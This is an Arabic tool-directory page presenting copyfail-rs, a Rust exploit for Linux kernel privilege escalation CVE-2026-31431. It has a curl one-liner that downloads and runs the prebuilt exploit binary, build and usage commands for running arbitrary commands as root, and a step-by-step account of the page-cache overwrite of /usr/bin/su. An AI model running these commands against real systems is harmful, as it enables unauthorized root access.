Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sammwyy/copyfail-rs
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالتطوير الحمولاتاستغلال الملفات الثنائية
GitHubsammwyy/copyfail-rs

copyfail-rs

نسخ استغلال الفشل (CVE-2026-31431) ولكن بلغة Rust.

عرض المستودع
1424منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

copyfail-rs

استغلال Copy Fail (CVE-2026-31431) ولكن بلغة Rust، وهي ثغرة حرجة تربط بين AF_ALG و splice() لتحقيق كتابة بحجم 4 بايت في ذاكرة التخزين المؤقت للصفحات، مما يؤدي إلى تصعيد الامتيازات محليًا على توزيعات Linux الرئيسية.

استنادًا إلى البحث وPoC من Xint Code.

إخلاء مسؤولية

[!CAUTION] هذا المشروع لأغراض تعليمية وبحثية فقط. تشغيل هذا الاستغلال على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وغير أخلاقي. استخدم هذا الكود بمسؤولية لفهم والدفاع ضد الثغرات المماثلة.

الميزات

  • Rust نقي: تنفيذ عالي الأداء وآمن للذاكرة من PoC الأصلي المكتوب بلغة Python.
  • مُنشئ ELF ديناميكي: يبني حمولة الاستغلال برمجيًا في وقت التشغيل، مما يسمح بأوامر مخصصة.
  • استغلال بدون نسخ: يتفاعل مباشرة مع استدعاءات نظام Linux kernel الخاصة بـ AF_ALG و splice() عبر libc.
  • قابل للتخصيص: حدد الأمر الذي تريد تشغيله كجذر عبر وسائط سطر الأوامر.

بدء سريع (سطر واحد)

يمكنك تنزيل وتشغيل ثنائي PoC المُجمّع مسبقًا مباشرة:

root@kitploit:~
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs

المتطلبات الأساسية

  • نواة Linux معرضة لثغرة CVE-2026-31431 (عادةً النوى قبل التصحيح في أبريل 2026).
  • الوصول إلى ملف ثنائي مستهدف بأذونات قراءة (الافتراضي هو /usr/bin/su).

التثبيت

استنسخ المستودع وقم ببناء الثنائي:

root@kitploit:~
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release

الاستخدام

شغّل الاستغلال بدون وسائط للافتراضي إلى /bin/sh:

root@kitploit:~
./target/release/copyfail-rs

أو حدد أمرًا مخصصًا لتشغيله كجذر:

root@kitploit:~
./target/release/copyfail-rs "whoami > /tmp/pwned"

كيف يعمل

يستغل هذا الاستغلال خطأً في تنفيذ authencesn داخل واجهة Crypto API في نواة Linux (AF_ALG). من خلال ربط sendmsg مع MSG_MORE و splice()، يمكن الكتابة فوق أجزاء صغيرة من ذاكرة التخزين المؤقت للصفحات لملفات عشوائية (مثل /usr/bin/su) بحمولة ELF خبيثة.

  1. إعداد المقبس: إنشاء مقبس AF_ALG وربطه بـ authencesn(hmac(sha256),cbc(aes)).
  2. توليد الحمولة: بناء ELF صغير في الذاكرة ينفذ الأمر المستهدف بامتيازات الجذر.
  3. حقن ذاكرة التخزين المؤقت: ربط الحمولة بشكل متكرر في ذاكرة التخزين المؤقت للصفحات للملف المستهدف باستخدام ثغرة AF_ALG.
  4. التشغيل: تنفيذ الملف المستهدف المعدل، لتشغيل الشيفرة المحقونة.

المراجع

  • المقالة الأصلية - Xint Code
  • تفاصيل CVE-2026-31431
تنزيل الأداة